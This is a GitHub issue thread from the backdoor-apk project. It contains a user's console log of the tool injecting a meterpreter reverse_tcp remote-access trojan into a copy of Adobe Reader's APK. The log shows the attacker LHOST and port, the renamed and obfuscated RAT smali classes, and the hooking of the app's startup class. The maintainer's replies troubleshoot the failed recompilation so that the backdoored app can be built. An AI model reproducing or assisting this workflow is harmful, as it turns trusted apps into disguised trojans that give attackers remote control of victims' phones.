### ISSUE TITLE
[!] Failed to recompile original

### ISSUE THREAD

**Issue by aungsoehein** [dana-at-cp/backdoor-apk#168]
./backdoor-apk.sh AdobeReader.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Thu Feb 28 02:23:19 +0630 2019
[+] Android payload options:
1) meterpreter/reverse_http   3) meterpreter/reverse_tcp    5) shell/reverse_https
2) meterpreter/reverse_https  4) shell/reverse_http	    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.8.120
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/adobe/reader
[+] Smali file to hook RAT payload: com/adobe/reader/misc/ARApp.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[+] Keeping permissions of original project
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/adobe/reader/zylvq
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xbfnn
[+] Generated new smali class name for MainService.smali: Cfxff
[+] Generated new smali class name for Payload.smali: Ebzdm
[+] Generated new smali class name for StringObfuscator.smali: Ituds
[+] Generated new smali method name for StringObfuscator.obfuscate method: dtjqz
[+] Generated new smali method name for StringObfuscator.unobfuscate method: bkstn
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[+] Unable to add persistence hook due to missing permission
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by dana-at-cp** [comment]
1. Make sure you are running the latest version of apktool
2. Check run.log and verify an error occurred during apktool recompilation
3. Execute the following command: apktool empty-framework-dir --force
4. Retry using the backdoor-apk.sh script

**Comment by dana-at-cp** [comment]
More info from apktool: https://github.com/iBotPeaches/Apktool/issues/1579

**Comment by dana-at-cp** [comment]
If none of the suggestions work then please try another APK. I can't provide support for apktool.
